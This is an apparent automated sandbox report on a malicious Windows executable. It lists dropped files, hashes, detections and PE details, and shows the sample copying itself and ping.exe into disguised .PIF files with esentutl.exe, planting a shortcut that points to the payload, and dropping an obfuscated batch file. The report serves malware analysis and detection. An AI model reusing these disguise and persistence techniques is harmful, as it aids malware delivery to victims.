SHA-256:	C571BD5C83C953F47F816B51340FA80FEA1C42A3BE86FE46BDBE6D09B90C3864
SHA-512:	B42216326760646CB7300A0D1E634E6013637F32C713BC570E360073BD418290A99F44C3A134BBB7BEBF18BCB705361A1C6BCE7CBF281ACB3ACECF027E446D52
Malicious:	true
Preview:	...W!..I.%....#.%..!...$. ..%".%!..". .........% ....#......#...%.......... . ...........#.....!."...!..."...# .....W!..IW.............W!..I........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T.........................>...R..7...............................................................................................................................................................................................................................................................................................................................................................

C:\Users\Public\Libraries\Ntmftfld.PIF

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1566208
Entropy (8bit):	7.004156501152886
Encrypted:	false
SSDEEP:	24576:RWGddPN4jN35Ohf8aT7JYR/MNPjWXY1Q7/VJJzsaz:RLLW15OOsYR/wjWXY1QZNz
MD5:	06A72BA35AAFF1B3AB0EA4D3E2E65451
SHA1:	656564A2AFC61D10E70D4833A0A57EF046709963
SHA-256:	050736376A0870AEA56E2FAF90EA34AA7AF231C7B2D3D209BCAC91628EEC77C9
SHA-512:	CFFAE7007D5B2A972F0F2E3FC044B6FB96A91B1D4609F575C113B8920DABB986E9709A3A599CD32D30B8681838CFF797B198E3A9FBB543B5622E36143AB9A79B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 66%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..............................................@.............................. &...........................P...i...........................@......................,................................text............................... ..`.itext.............................. ..`.data...............................@....bss.....6...............................idata.. &.......(..................@....tls....4....0...........................rdata.......@......................@..@.reloc...i...P...j..................@..B.rsrc................4..............@..@....................................@..@................................................................................................

C:\Users\Public\Libraries\PNO

Download File

Process:	C:\Users\user\Desktop\1m181Ru74o.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4
Entropy (8bit):	2.0
Encrypted:	false
SSDEEP:	3:z:z
MD5:	E65F6D7F08D9245461E19A296FBEA585
SHA1:	71CCBED1E7DC1F5A96E23C6CC44A8C113613A396
SHA-256:	4C50D27C5031D7F039FE61DBD05B1E84B02D76786F79C569BE88AA04C95AA417
SHA-512:	C0B4B359E61A98D8E0DC8197E59F4E541BE174C05B5455CB08C7AAA2E1453A0F3BB24F2147DD95E95D1D36C79091A3401ABB49A47EC973E9FE87E2399F8CF4CF
Malicious:	false
Preview:	49..

C:\Users\Public\Libraries\dlftfmtN.cmd

Download File

Process:	C:\Users\user\Desktop\1m181Ru74o.exe
File Type:	DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
Category:	dropped
Size (bytes):	62357
Entropy (8bit):	4.705712327109906
Encrypted:	false
SSDEEP:	768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
MD5:	B87F096CBC25570329E2BB59FEE57580
SHA1:	D281D1BF37B4FB46F90973AFC65EECE3908532B2
SHA-256:	D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
SHA-512:	72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
Malicious:	false
Preview:	@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .

C:\Users\Public\Ntmftfld.url

Download File

Process:	C:\Users\user\Desktop\1m181Ru74o.exe
File Type:	MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Ntmftfld.PIF">), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	5.083162584502751
Encrypted:	false
SSDEEP:	3:HRAbABGQYmTWAX+rSF55i0XMRIDlPjvsbxzw:HRYFVmTWDyz2+lPTExzw
MD5:	00B20EA3B89920289D00BBFED5F93925
SHA1:	B2D420E9ED8ED0F59BAD3E1DF449EE5021CD57D5
SHA-256:	CA681ABDE251C76FB4EE04A0BE65B52C871B553B0D73B3708DB8497DDA7A0F64
SHA-512:	FF27EA7E7D110E1531798DAC72100EF0034572744B3853B9AE1204B5D0AC1C94E09100BBF1F9115146F8EF41B00A9CA1B26996DF51F5DC4A6E68ADBD5CD99E30
Malicious:	true
Preview:	[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Ntmftfld.PIF"..IconIndex=922662..HotKey=97..

C:\Users\Public\alpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	236544
Entropy (8bit):	6.4416694948877025
Encrypted:	false
SSDEEP:	6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
MD5:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
SHA1:	4048488DE6BA4BFEF9EDF103755519F1F762668F
SHA-256:	4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
SHA-512:	80E127EF81752CD50F9EA2D662DC4D3BF8DB8D29680E75FA5FC406CA22CAFA5C4D89EF2EAC65B486413D3CDD57A2C12A1CB75F65D1E312A717D262265736D1C2
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: nft438A5fN.exe, Detection: malicious, Browse Filename: RFQ_PO_N39859JFK_ORDER_SPECIFICATIONS_OM.bat, Detection: malicious, Browse Filename: IBKB.vbs, Detection: malicious, Browse Filename: USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exe, Detection: malicious, Browse Filename: USD470900_COPY_800BLHSBC882001.PDF.bat, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd, Detection: malicious, Browse Filename: x.exe, Detection: malicious, Browse Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........+.l.J.?.J.?.J.?.2(?.J.?.!.>.J.?.!.>.J.?.J.?.K.?.!.>.J.?.!.>.J.?.!.>.J.?.!D?.J.?.!.>.J.?Rich.J.?................PE..L....~.............................. k............@..................................j....@.................................................................p...%...5..T............................................................................text............................... ..`.data...8...........................@....idata...$.......&..................@..@.didat..H...........................@....rsrc...............................@..@.reloc...%...p...&...v..............@..B................................................................................................................................................................................................................................................................................

C:\Users\Public\xpha.pif

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18944
Entropy (8bit):	5.742964649637377
Encrypted:	false
SSDEEP:	384:PVhNH/TqNcx+5tTAjtn3bPcPwoeGULZbiWBlWjVw:PVhZXx+5tTetLVohULZJgw
MD5:	B3624DD758CCECF93A1226CEF252CA12
SHA1:	FCF4DAD8C4AD101504B1BF47CBBDDBAC36B558A7
SHA-256:	4AAA74F294C15AEB37ADA8185D0DEAD58BD87276A01A814ABC0C4B40545BF2EF
SHA-512:	C613D18511B00FA25FC7B1BDDE10D96DEBB42A99B5AAAB9E9826538D0E229085BB371F0197F6B1086C4F9C605F01E71287FFC5442F701A95D67C232A5F031838
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......G.[...5]..5]..5]..]'.5]..0\..5]..6\..5]..1\..5]..4]Q.5]..4\..5]..=\..5]...]..5]..7\..5]Rich..5]................PE..L....$Z.....................2......P4.......@....@..................................c....@...... ..........................`a..\|....p.. ...............................T............................................`..\............................text....)......................... ..`.data........@......................@....idata.......`.......0..............@..@.rsrc... ....p.......<..............@..@.reloc...............F..............@..B........................................................................................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	590
Entropy (8bit):	4.629489089285156
Encrypted:	false
SSDEEP:	12:q71j/xTz28imeSbZ7u0wxDDDDDDDDjCaY5dOMlaYAfTB8NGNd:y1j/xTz28Rp7u0wQakdO+a5t8Ny
MD5:	7D3929C5A67E312C1F8844AEC4438918
SHA1:	8CA674D1EFC50F67F6F68D2A9098BD5FBE95C8F6
SHA-256:	E3D24E182D0888D5DF74D471AED8273C9CEEEA2F897144870BF8F36B5EB02B56
SHA-512:	690064A06CEC7FC579C5A7536CD86FEB3772098641307FAB91C66EB5834996C0A1C60AAA3CEE997F4ED148AD5E2C62F40BD2788FF6E500F1F7FBD09948C25005
Malicious:	false
Preview:	..Initiating COPY FILE mode..... Source File: C:\Users\user\Desktop\1m181Ru74o.exe...Destination File: C:\\Users\\Public\\Libraries\\Ntmftfld.PIF...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... \|----\|----\|----\|----\|----\|----\|----\|----\|----\|----\|... ..........................................................Total bytes read = 0x17e600 (1566208) (1 MB)....Total bytes written = 0x17f000 (1568768) (1 MB).......Operation completed successfully in 0.140 seconds.....

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\esentutl.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	560
Entropy (8bit):	4.532578488470501
Encrypted:	false
SSDEEP:	12:q6p4xTXWIceSbZ7u0wxDDDDDDDDjCaY5B4aYA/4TB8NGNBG:/p4xT5cp7u0wQakB4aV4t8Nd
MD5:	4D6C195EBA3736E57EF6A03F1EEEF490
SHA1:	237210C613550627B46D6D6AB82F396EACA3EA20
SHA-256:	FF89C20795C881958044CCE205E8EBAE0CC028631ED1E354BEF0AF0C5BD23E3C
SHA-512:	2E4AC9CDB61DDEFDDEE6378C39282BABFCC457BB896D1B92E07E234BC202D0677FC20BD96FD0102A32B211DB5D47DDB1C8C0A396A481C9696E7CF0DF4959D3A1
Malicious:	false
Preview:	..Initiating COPY FILE mode..... Source File: C:\\Windows\\System32\\ping.exe...Destination File: C:\\Users\\Public\\xpha.pif...... Copy Progress (% complete)...... 0 10 20 30 40 50 60 70 80 90 100... \|----\|----\|----\|----\|----\|----\|----\|----\|----\|----\|... ..........................................................Total bytes read = 0x4a00 (18944) (0 MB)....Total bytes written = 0x5000 (20480) (0 MB).......Operation completed successfully in 0.62 seconds.....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.004156501152886
TrID:	Win32 Executable (generic) a (10002005/4) 99.38% InstallShield setup (43055/19) 0.43% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	1m181Ru74o.exe
File size:	1'566'208 bytes
MD5:	06a72ba35aaff1b3ab0ea4d3e2e65451
SHA1:	656564a2afc61d10e70d4833a0a57ef046709963
SHA256:	050736376a0870aea56e2faf90ea34aa7af231c7b2d3d209bcac91628eec77c9
SHA512:	cffae7007d5b2a972f0f2e3fc044b6fb96a91b1d4609f575c113b8920dabb986e9709a3a599cd32d30b8681838cff797b198e3a9fbb543b5622e36143ab9a79b
SSDEEP:	24576:RWGddPN4jN35Ohf8aT7JYR/MNPjWXY1Q7/VJJzsaz:RLLW15OOsYR/wjWXY1QZNz
TLSH:	8575143E61E059A2D3B31471CF12A7E85E1D7A2E5AA0368766C0FE783BB7101DF35906
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	4b24191c2e0a3108

Static PE Info

General

Entrypoint:	0x4607bc
Entrypoint Section:	.itext
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	2f9e78edff3aa94d2509b054c2b17704

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0045F370h
call 00007F1B10967ECDh
mov eax, dword ptr [0046B964h]
mov eax, dword ptr [eax]
call 00007F1B109B6D6Dh
mov ecx, dword ptr [0046B724h]
mov eax, dword ptr [0046B964h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045EEA4h]
call 00007F1B109B6D6Dh
mov eax, dword ptr [0046B964h]
mov eax, dword ptr [eax]
call 00007F1B109B6DE1h
call 00007F1B10965C70h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x70000	0x2620	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7c000	0x10b200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x75000	0x69dc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x74000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x7072c	0x5ec	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x5e5d0	0x5e600	3a25bcf802d4669a519ae714f0d49a3e	False	0.5180437706953642	data	6.528324618369781	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0x60000	0x804	0xa00	3ee2673b37dd1671a8e85af95993144c	False	0.506640625	data	5.403605836167057	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x61000	0xab08	0xac00	ddc1e481e9fd7a3a81e8d2ccc84f9be3	False	0.07512718023255814	data	1.648081661163121	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0x6c000	0x36f4	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x70000	0x2620	0x2800	8bb962d09c3f1079b25097724eed32f0	False	0.31015625	MIPSEB-LE MIPS-III ECOFF executable stripped - version 0.7	5.054262203362614	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0x73000	0x34	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0x74000	0x18	0x200	f9f829f47e8d60bd7a821436197b36f9	False	0.05078125	MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "G"	0.2108262677871819	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x75000	0x69dc	0x6a00	124fdc2c337a99423f77aa54309fce61	False	0.6611880896226415	data	6.709317544019835	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.rsrc	0x7c000	0x10b200	0x10b200	e916037e6bfd05cf05ff908f80cdf0f1	False	0.534396752164249	data	6.841359872649536	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x7d2c4	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"	English	United States	0.38636363636363635
RT_CURSOR	0x7d3f8	0x134	data	English	United States	0.4642857142857143
RT_CURSOR	0x7d52c	0x134	data	English	United States	0.4805194805194805
RT_CURSOR	0x7d660	0x134	data	English	United States	0.38311688311688313
RT_CURSOR	0x7d794	0x134	data	English	United States	0.36038961038961037
RT_CURSOR	0x7d8c8	0x134	data	English	United States	0.4090909090909091
RT_CURSOR	0x7d9fc	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"	English	United States	0.4967532467532468
RT_BITMAP	0x7db30	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x7dd00	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380	English	United States	0.46487603305785125
RT_BITMAP	0x7dee4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.43103448275862066
RT_BITMAP	0x7e0b4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39870689655172414
RT_BITMAP	0x7e284	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.4245689655172414
RT_BITMAP	0x7e454	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5021551724137931
RT_BITMAP	0x7e624	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5064655172413793
RT_BITMAP	0x7e7f4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x7e9c4	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.5344827586206896
RT_BITMAP	0x7eb94	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360	English	United States	0.39655172413793105
RT_BITMAP	0x7ed64	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.39864864864864863
RT_BITMAP	0x7ee8c	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States	0.3885135135135135
RT_BITMAP	0x7efb4	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3885135135135135
RT_BITMAP	0x7f0dc	0xe8	Device independent bitmap graphic, 13 x 16 x 4, image size 128	English	United States	0.36637931034482757
RT_BITMAP	0x7f1c4	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.3614864864864865
RT_BITMAP	0x7f2ec	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States	0.3783783783783784
RT_BITMAP	0x7f414	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States	0.49038461538461536
RT_BITMAP	0x7f4e4	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3716216216216216
RT_BITMAP	0x7f60c	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.2905405405405405
RT_BITMAP	0x7f734	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.38175675675675674
RT_BITMAP	0x7f85c	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States	0.3783783783783784
RT_BITMAP	0x7f984	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3783783783783784
RT_BITMAP	0x7faac	0xe8	Device independent bitmap graphic, 12 x 16 x 4, image size 128	English	United States	0.3620689655172414
RT_BITMAP	0x7fb94	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.3581081081081081
RT_BITMAP	0x7fcbc	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States	0.375
RT_BITMAP	0x7fde4	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States	0.47115384615384615
RT_BITMAP	0x7feb4	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.36824324324324326
RT_BITMAP	0x7ffdc	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.28716216216216217
RT_BITMAP	0x80104	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3885135135135135
RT_BITMAP	0x8022c	0x128	Device independent bitmap graphic, 19 x 16 x 4, image size 192	English	United States	0.375
RT_BITMAP	0x80354	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.375
RT_BITMAP	0x8047c	0xe8	Device independent bitmap graphic, 13 x 16 x 4, image size 128	English	United States	0.36637931034482757
RT_BITMAP	0x80564	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.35135135135135137
RT_BITMAP	0x8068c	0x128	Device independent bitmap graphic, 20 x 16 x 4, image size 192	English	United States	0.36486486486486486
RT_BITMAP	0x807b4	0xd0	Device independent bitmap graphic, 13 x 13 x 4, image size 104	English	United States	0.47115384615384615
RT_BITMAP	0x80884	0xd6b28	Device independent bitmap graphic, 640 x 458 x 24, image size 879360, resolution 2835 x 2835 px/m	English	United States	0.5912519899931772
RT_BITMAP	0x1573ac	0x128	Device independent bitmap graphic, 21 x 16 x 4, image size 192	English	United States	0.3581081081081081
RT_BITMAP	0x1574d4	0x128	Device independent bitmap graphic, 17 x 16 x 4, image size 192	English	United States	0.28716216216216217
RT_BITMAP	0x1575fc	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_ICON	0x1576e4	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 944 x 944 px/m			0.2150562851782364
RT_ICON	0x15878c	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 944 x 944 px/m			0.1350622406639004
RT_ICON	0x15ad34	0x67e8	Device independent bitmap graphic, 80 x 160 x 32, image size 25600, resolution 944 x 944 px/m			0.12135338345864662
RT_DIALOG	0x16151c	0x52	data			0.7682926829268293
RT_DIALOG	0x161570	0x52	data			0.7560975609756098
RT_STRING	0x1615c4	0x19c	data			0.49271844660194175
RT_STRING	0x161760	0x294	data			0.4818181818181818
RT_STRING	0x1619f4	0xbc	data			0.6648936170212766
RT_STRING	0x161ab0	0xec	data			0.6398305084745762
RT_STRING	0x161b9c	0x31c	data			0.44472361809045224
RT_STRING	0x161eb8	0x3c8	data			0.37706611570247933
RT_STRING	0x162280	0x368	data			0.4013761467889908
RT_STRING	0x1625e8	0x3cc	data			0.33539094650205764
RT_STRING	0x1629b4	0x214	data			0.49624060150375937
RT_STRING	0x162bc8	0xcc	data			0.6274509803921569
RT_STRING	0x162c94	0x194	data			0.5643564356435643
RT_STRING	0x162e28	0x3c4	data			0.3288381742738589
RT_STRING	0x1631ec	0x338	data			0.42961165048543687
RT_STRING	0x163524	0x294	data			0.42424242424242425
RT_RCDATA	0x1637b8	0x10	data			1.5
RT_RCDATA	0x1637c8	0x320	data			0.69875
RT_RCDATA	0x163ae8	0x233d7	Delphi compiled form 'T__1607376128'			0.3478104237822409
RT_GROUP_CURSOR	0x186ec0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x186ed4	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.25
RT_GROUP_CURSOR	0x186ee8	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x186efc	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x186f10	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x186f24	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_CURSOR	0x186f38	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States	1.3
RT_GROUP_ICON	0x186f4c	0x30	data			0.9375
RT_MANIFEST	0x186f7c	0x245	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5249569707401033

Imports

DLL	Import
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
user32.dll	GetKeyboardType, DestroyWindow, LoadStringA, MessageBoxA, CharNextA
kernel32.dll	GetACP, Sleep, VirtualFree, VirtualAlloc, GetTickCount, QueryPerformanceCounter, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, CompareStringA, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
user32.dll	CreateWindowExA, WindowFromPoint, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageW, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageW, PeekMessageA, OffsetRect, OemToCharA, MsgWaitForMultipleObjects, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageW, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessagePos, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameA, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongA, GetClassInfoA, 